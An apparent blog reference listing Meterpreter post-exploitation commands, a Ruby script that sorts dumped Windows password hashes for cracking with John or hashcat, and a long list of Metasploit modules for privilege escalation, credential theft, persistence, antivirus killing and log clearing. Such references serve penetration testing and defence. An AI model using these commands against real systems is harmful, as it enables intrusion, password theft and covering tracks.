A running list of the commands available in Meterpreter.
I plan to keep updating it.
・sysinfo
Shows system information for the target (computer name, OS, architecture, domain, logged-on users).
・ipconfig
Lists the target's network interfaces, like the Windows ipconfig command.
・ps
Lists running processes (PID, PPID, name, architecture, session, user, path); useful for picking a target for migrate.
・getuid
Shows which user the Meterpreter server is running as.
・getsystem
Attempts to elevate the session to NT AUTHORITY\SYSTEM.
With no options it tries each available technique in turn (named-pipe impersonation, token duplication). It only succeeds from a session that already holds local administrator rights; from a UAC-restricted admin session, run a bypassuac module first and then getsystem.
・getprivs
Enables every privilege available to the current process token and lists them (e.g. SeDebugPrivilege, SeImpersonatePrivilege).
・hashdump
Dumps the local SAM password hashes. Requires SYSTEM, so run getsystem first.
Output is one pwdump-format line per account (username:RID:LM hash:NT hash:::), which john reads directly, e.g. john --format=NT.
・upload <local file> <remote path>
Uploads a file from the attacker's host to the target.
・download <remote file> [local path]
Downloads a file from the target to the attacker's host.
・timestomp <file> -z "01/01/2005 00:00:00"
Changes a file's timestamps. -z sets all four MACE values (modified, accessed, created, entry modified) to the given time, format MM/DD/YYYY HH24:MI:SS. Note that it only rewrites the $STANDARD_INFORMATION timestamps; the $FILE_NAME attribute keeps the originals, which is what forensic tools compare against to spot timestomping.
・screenshot
Captures the target's desktop as a JPEG, saved on the machine running Metasploit and opened in its browser.
・clearev
Clears the Application, System and Security event logs on the target. Clearing is itself logged: Windows writes Security event 1102 ("The audit log was cleared") and System event 104, so this is noisy rather than stealthy.
・execute -f <file>
Runs an executable on the target. Add -H to hide the window and -i to interact with the process.
・run
Runs a Meterpreter script or post module inside the current session. Type run and press Tab to list what is available (press it again if the shell asks to confirm the long list).
The classic scripts below still work but are deprecated in favour of post modules; the replacements are included in the list further down.
・run checkvm
Checks whether the target is a virtual machine (replacement: post/windows/gather/checkvm).
・run killav
Kills known antivirus processes (replacement: post/windows/manage/killav).
・run getgui -e
Enables Remote Desktop on the target (replacement: post/windows/manage/enable_rdp).
・run keylogrecorder
Runs a keylogger (replacement: post/windows/capture/keylog_recorder).
・run packetrecorder
Captures packets on the target.
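The hashdump entry above says the hashes go to john; in practice the dump needs a quick triage first (which accounts have no password at all, which still store the trivially crackable LM hash, which accounts share a password). The following Ruby script is an added example for this page, not code from Metasploit or from the original post. The dump it parses is constructed; the NT hash on the first and third accounts is the well-known NT hash of the string "password" and the LM hash on the third is the LM hash of the same string. The function names and the console-noise line are my own assumptions.

```ruby
#!/usr/bin/env ruby
# Triage Meterpreter `hashdump` output before handing it to John the Ripper.
# Added example for this page; not part of Metasploit or of the original post.
# hashdump prints one pwdump-format line per local account:
#   username:RID:LM_hash:NT_hash:::

# Well-known "nothing here" values: the empty LM field (LM storage is disabled
# by default since Vista) and the NT hash of the empty string.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

# Constructed sample (not from a real host). 8846f7ea... is the NT hash of
# "password"; e52cac67... is the LM hash of the same string.
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  [*] this is console noise, not a hash line
DUMP

# One pwdump line: user, numeric RID, 32 hex chars LM, 32 hex chars NT, ":::".
HASH_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

# Parse pwdump lines into records; anything that is not a hash line is skipped.
def parse_hashdump(text)
  text.each_line.filter_map do |line|
    m = HASH_LINE.match(line.strip) or next
    user, rid, lm, nt = m.captures
    {
      user: user,
      rid: rid.to_i,
      lm: lm.downcase,
      nt: nt.downcase,
      lm_stored: lm.casecmp(EMPTY_LM) != 0,    # LM present => two 7-char DES halves, crack first
      blank_password: nt.casecmp(EMPTY_NT) == 0 # NT hash of "" => account has no password
    }
  end
end

# Accounts with identical NT hashes share a password; worth knowing before cracking.
def shared_passwords(entries)
  entries.reject { |e| e[:blank_password] }
         .group_by { |e| e[:nt] }
         .select { |_, group| group.size > 1 }
         .transform_values { |group| group.map { |e| e[:user] } }
end

# Build cracker input. John reads pwdump lines as-is (--format=NT or --format=LM);
# hashcat -m 1000 takes the bare NT hash (or user:hash with --username).
def cracker_input(entries)
  live = entries.reject { |e| e[:blank_password] }
  pwdump = ->(e) { "#{e[:user]}:#{e[:rid]}:#{e[:lm]}:#{e[:nt]}:::" }
  {
    john_lm: live.select { |e| e[:lm_stored] }.map(&pwdump),
    john_nt: live.map(&pwdump),
    hashcat_nt: live.map { |e| e[:nt] }.uniq
  }
end

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(SAMPLE_HASHDUMP)
  entries.each do |e|
    flags = []
    flags << 'BLANK PASSWORD' if e[:blank_password]
    flags << 'LM hash stored (john --format=LM first)' if e[:lm_stored]
    puts format('%-16s rid=%-5d %s', e[:user], e[:rid], flags.join(', '))
  end
  shared_passwords(entries).each { |nt, users| puts "shared NT hash #{nt}: #{users.join(', ')}" }
  puts '--- feed to john --format=NT ---'
  puts cracker_input(entries)[:john_nt]
end
```

Save the real hashdump output to a file, read it in place of SAMPLE_HASHDUMP, and write the john_nt lines to a file for `john --format=NT`; crack the john_lm lines with `--format=LM` first, since a recovered LM password gives the NT password up to letter case.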
List of scripts and modules available through run
I'll take the names as self-explanatory for the most part.
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run winbf
run winenum
run wmic
run exploit/windows/local/adobe_sandbox_adobecollabsync
run exploit/windows/local/agnitum_outpost_acs
run exploit/windows/local/alpc_taskscheduler
run exploit/windows/local/always_install_elevated
run exploit/windows/local/anyconnect_lpe
run exploit/windows/local/applocker_bypass
run exploit/windows/local/appxsvc_hard_link_privesc
run exploit/windows/local/ask
run exploit/windows/local/bits_ntlm_token_impersonation
run exploit/windows/local/bthpan
run exploit/windows/local/bypassuac
run exploit/windows/local/bypassuac_comhijack
run exploit/windows/local/bypassuac_dotnet_profiler
run exploit/windows/local/bypassuac_eventvwr
run exploit/windows/local/bypassuac_fodhelper
run exploit/windows/local/bypassuac_injection
run exploit/windows/local/bypassuac_injection_winsxs
run exploit/windows/local/bypassuac_sdclt
run exploit/windows/local/bypassuac_silentcleanup
run exploit/windows/local/bypassuac_sluihijack
run exploit/windows/local/bypassuac_vbs
run exploit/windows/local/bypassuac_windows_store_filesys
run exploit/windows/local/bypassuac_windows_store_reg
run exploit/windows/local/capcom_sys_exec
run exploit/windows/local/comahawk
run exploit/windows/local/current_user_psexec
run exploit/windows/local/cve_2017_8464_lnk_lpe
run exploit/windows/local/cve_2018_8453_win32k_priv_esc
run exploit/windows/local/cve_2019_1458_wizardopium
run exploit/windows/local/cve_2020_0668_service_tracing
run exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
run exploit/windows/local/cve_2020_0796_smbghost
run exploit/windows/local/cve_2020_1048_printerdemon
run exploit/windows/local/cve_2020_1054_drawiconex_lpe
run exploit/windows/local/cve_2020_1313_system_orchestrator
run exploit/windows/local/cve_2020_1337_printerdemon
run exploit/windows/local/cve_2020_17136
run exploit/windows/local/cve_2021_1732_win32k
run exploit/windows/local/cve_2021_21551_dbutil_memmove
run exploit/windows/local/dnsadmin_serverlevelplugindll
run exploit/windows/local/docker_credential_wincred
run exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
run exploit/windows/local/gog_galaxyclientservice_privesc
run exploit/windows/local/ikeext_service
run exploit/windows/local/ipass_launch_app
run exploit/windows/local/lenovo_systemupdate
run exploit/windows/local/microfocus_operations_privesc
run exploit/windows/local/mov_ss
run exploit/windows/local/mqac_write
run exploit/windows/local/ms10_015_kitrap0d
run exploit/windows/local/ms10_092_schelevator
run exploit/windows/local/ms11_080_afdjoinleaf
run exploit/windows/local/ms13_005_hwnd_broadcast
run exploit/windows/local/ms13_053_schlamperei
run exploit/windows/local/ms13_081_track_popup_menu
run exploit/windows/local/ms13_097_ie_registry_symlink
run exploit/windows/local/ms14_009_ie_dfsvc
run exploit/windows/local/ms14_058_track_popup_menu
run exploit/windows/local/ms14_070_tcpip_ioctl
run exploit/windows/local/ms15_004_tswbproxy
run exploit/windows/local/ms15_051_client_copy_image
run exploit/windows/local/ms15_078_atmfd_bof
run exploit/windows/local/ms16_014_wmi_recv_notif
run exploit/windows/local/ms16_016_webdav
run exploit/windows/local/ms16_032_secondary_logon_handle_privesc
run exploit/windows/local/ms16_075_reflection
run exploit/windows/local/ms16_075_reflection_juicy
run exploit/windows/local/ms18_8120_win32k_privesc
run exploit/windows/local/ms_ndproxy
run exploit/windows/local/novell_client_nicm
run exploit/windows/local/novell_client_nwfs
run exploit/windows/local/nscp_pe
run exploit/windows/local/ntapphelpcachecontrol
run exploit/windows/local/ntusermndragover
run exploit/windows/local/nvidia_nvsvc
run exploit/windows/local/panda_psevents
run exploit/windows/local/payload_inject
run exploit/windows/local/persistence
run exploit/windows/local/persistence_image_exec_options
run exploit/windows/local/persistence_service
run exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
run exploit/windows/local/powershell_cmd_upgrade
run exploit/windows/local/powershell_remoting
run exploit/windows/local/ppr_flatten_rec
run exploit/windows/local/ps_persist
run exploit/windows/local/ps_wmi_exec
run exploit/windows/local/pxeexploit
run exploit/windows/local/razer_zwopenprocess
run exploit/windows/local/registry_persistence
run exploit/windows/local/ricoh_driver_privesc
run exploit/windows/local/run_as
run exploit/windows/local/s4u_persistence
run exploit/windows/local/service_permissions
run exploit/windows/local/srclient_dll_hijacking
run exploit/windows/local/tokenmagic
run exploit/windows/local/unquoted_service_path
run exploit/windows/local/virtual_box_guest_additions
run exploit/windows/local/virtual_box_opengl_escape
run exploit/windows/local/vss_persistence
run exploit/windows/local/webexec
run exploit/windows/local/windscribe_windscribeservice_priv_esc
run exploit/windows/local/wmi
run exploit/windows/local/wmi_persistence
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets
run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/aix/hashdump
run post/android/capture/screen
run post/android/gather/hashdump
run post/android/gather/sub_info
run post/android/gather/wireless_ap
run post/android/local/koffee
run post/android/manage/remove_lock
run post/android/manage/remove_lock_root
run post/apple_ios/gather/ios_image_gather
run post/apple_ios/gather/ios_text_gather
run post/bsd/gather/hashdump
run post/firefox/gather/cookies
run post/firefox/gather/history
run post/firefox/gather/passwords
run post/firefox/gather/xss
run post/firefox/manage/webcam_chat
run post/hardware/automotive/can_flood
run post/hardware/automotive/canprobe
run post/hardware/automotive/getvinfo
run post/hardware/automotive/identifymodules
run post/hardware/automotive/malibu_overheat
run post/hardware/automotive/mazda_ic_mover
run post/hardware/automotive/pdt
run post/hardware/rftransceiver/rfpwnon
run post/hardware/rftransceiver/transmitter
run post/hardware/zigbee/zstumbler
run post/linux/busybox/enum_connections
run post/linux/busybox/enum_hosts
run post/linux/busybox/jailbreak
run post/linux/busybox/ping_net
run post/linux/busybox/set_dmz
run post/linux/busybox/set_dns
run post/linux/busybox/smb_share_root
run post/linux/busybox/wget_exec
run post/linux/dos/xen_420_dos
run post/linux/gather/checkcontainer
run post/linux/gather/checkvm
run post/linux/gather/ecryptfs_creds
run post/linux/gather/enum_commands
run post/linux/gather/enum_configs
run post/linux/gather/enum_containers
run post/linux/gather/enum_nagios_xi
run post/linux/gather/enum_network
run post/linux/gather/enum_protections
run post/linux/gather/enum_psk
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/gnome_commander_creds
run post/linux/gather/gnome_keyring_dump
run post/linux/gather/haserl_read
run post/linux/gather/hashdump
run post/linux/gather/mount_cifs_creds
run post/linux/gather/openvpn_credentials
run post/linux/gather/phpmyadmin_credsteal
run post/linux/gather/pptpd_chap_secrets
run post/linux/gather/tor_hiddenservices
run post/linux/manage/dns_spoofing
run post/linux/manage/download_exec
run post/linux/manage/iptables_removal
run post/linux/manage/pseudo_shell
run post/linux/manage/sshkey_persistence
run post/multi/escalate/aws_create_iam_user
run post/multi/escalate/cups_root_file_read
run post/multi/escalate/metasploit_pcaplog
run post/multi/gather/apple_ios_backup
run post/multi/gather/aws_ec2_instance_metadata
run post/multi/gather/aws_keys
run post/multi/gather/check_malware
run post/multi/gather/chrome_cookies
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/docker_creds
run post/multi/gather/enum_hexchat
run post/multi/gather/enum_software_versions
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/fetchmailrc_creds
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/gpg_creds
run post/multi/gather/grub_creds
run post/multi/gather/irssi_creds
run post/multi/gather/jboss_gather
run post/multi/gather/jenkins_gather
run post/multi/gather/lastpass_creds
run post/multi/gather/maven_creds
run post/multi/gather/multi_command
run post/multi/gather/netrc_creds
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/remmina_creds
run post/multi/gather/resolve_hosts
run post/multi/gather/rsyncd_creds
run post/multi/gather/rubygems_api_key
run post/multi/gather/run_console_rc_file
run post/multi/gather/saltstack_salt
run post/multi/gather/skype_enum
run post/multi/gather/ssh_creds
run post/multi/gather/thunderbird_creds
run post/multi/gather/tomcat_gather
run post/multi/gather/ubiquiti_unifi_backup
run post/multi/gather/unix_cached_ad_hashes
run post/multi/gather/unix_kerberos_tickets
run post/multi/gather/wlan_geolocate
run post/multi/general/close
run post/multi/general/execute
run post/multi/general/wall
run post/multi/manage/autoroute
run post/multi/manage/dbvis_add_db_admin
run post/multi/manage/dbvis_query
run post/multi/manage/hsts_eraser
run post/multi/manage/multi_post
run post/multi/manage/open
run post/multi/manage/play_youtube
run post/multi/manage/record_mic
run post/multi/manage/screensaver
run post/multi/manage/screenshare
run post/multi/manage/set_wallpaper
run post/multi/manage/shell_to_meterpreter
run post/multi/manage/sudo
run post/multi/manage/system_session
run post/multi/manage/upload_exec
run post/multi/manage/zip
run post/multi/recon/local_exploit_suggester
run post/multi/recon/multiport_egress_traffic
run post/multi/recon/sudo_commands
run post/multi/sap/smdagent_get_properties
run exploit/multi/local/allwinner_backdoor
run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
run exploit/multi/local/xorg_x11_suid_server
run exploit/multi/local/xorg_x11_suid_server_modulepath
run post/networking/gather/enum_brocade
run post/networking/gather/enum_cisco
run post/networking/gather/enum_f5
run post/networking/gather/enum_juniper
run post/networking/gather/enum_mikrotik
run post/networking/gather/enum_vyos
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/golden_ticket
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/screen_unlock
run post/windows/escalate/unmarshal_cmd_exec
run post/windows/gather/ad_to_sqlite
run post/windows/gather/arp_scanner
run post/windows/gather/avast_memory_dump
run post/windows/gather/bitcoin_jacker
run post/windows/gather/bitlocker_fvek
run post/windows/gather/bloodhound
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/avira_password
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump
run post/windows/gather/credentials/dynazip_log
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_laps
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/heidisql
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/mcafee_vse_hashdump
run post/windows/gather/credentials/mdaemon_cred_collector
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/mssql_local_hashdump
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/pulse_secure
run post/windows/gather/credentials/purevpn_cred_collector
run post/windows/gather/credentials/razer_synapse
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/rdc_manager_creds
run post/windows/gather/credentials/securecrt
run post/windows/gather/credentials/skype
run post/windows/gather/credentials/smartermail
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/spark_im
run post/windows/gather/credentials/sso
run post/windows/gather/credentials/steam
run post/windows/gather/credentials/teamviewer_passwords
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/credentials/xshell_xftp_password
run post/windows/gather/dnscache_dump
run post/windows/gather/dumplinks
run post/windows/gather/enum_ad_bitlocker
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/enum_ad_to_wordlist
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_av_excluded
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
run post/windows/gather/enum_emet
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_hyperv_vms
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_muicache
run post/windows/gather/enum_onedrive
run post/windows/gather/enum_patches
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_prefetch
run post/windows/gather/enum_proxy
run post/windows/gather/enum_putty_saved_sessions
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_trusted_locations
run post/windows/gather/enum_unattend
run post/windows/gather/exchange
run post/windows/gather/file_from_raw_ntfs
run post/windows/gather/forensics/browser_history
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/fanny_bmp_check
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/recovery_files
run post/windows/gather/hashdump
run post/windows/gather/local_admin_search_enum
run post/windows/gather/lsa_secrets
run post/windows/gather/make_csv_orgchart
run post/windows/gather/memory_dump
run post/windows/gather/memory_grep
run post/windows/gather/netlm_downgrade
run post/windows/gather/ntds_grabber
run post/windows/gather/ntds_location
run post/windows/gather/outlook
run post/windows/gather/phish_windows_credentials
run post/windows/gather/psreadline_history
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/gather/word_unc_injector
run post/windows/manage/add_user
run post/windows/manage/archmigrate
run post/windows/manage/change_password
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/driver_loader
run post/windows/manage/enable_rdp
run post/windows/manage/enable_support_account
run post/windows/manage/exec_powershell
run post/windows/manage/execute_dotnet_assembly
run post/windows/manage/forward_pageant
run post/windows/manage/hashcarve
run post/windows/manage/ie_proxypac
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/install_python
run post/windows/manage/install_ssh
run post/windows/manage/killav
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server
run post/windows/manage/peinjector
run post/windows/manage/persistence_exe
run post/windows/manage/portproxy
run post/windows/manage/powershell/build_net_code
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/powershell/load_script
run post/windows/manage/pptp_tunnel
run post/windows/manage/priv_migrate
run post/windows/manage/pxeexploit
run post/windows/manage/reflective_dll_inject
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rid_hijack
run post/windows/manage/rollback_defender_signatures
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/run_as_psh
run post/windows/manage/sdel
run post/windows/manage/shellcode_inject
run post/windows/manage/sshkey_persistence
run post/windows/manage/sticky_keys
run post/windows/manage/vmdk_mount
run post/windows/manage/vss
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/manage/wdigest_caching
run post/windows/manage/webcam
run post/windows/recon/computer_browser_discovery
run post/windows/recon/outbound_ports
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_probe_request
run post/windows/wlan/wlan_profile
For more detail, there is a cheat sheet here:
https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf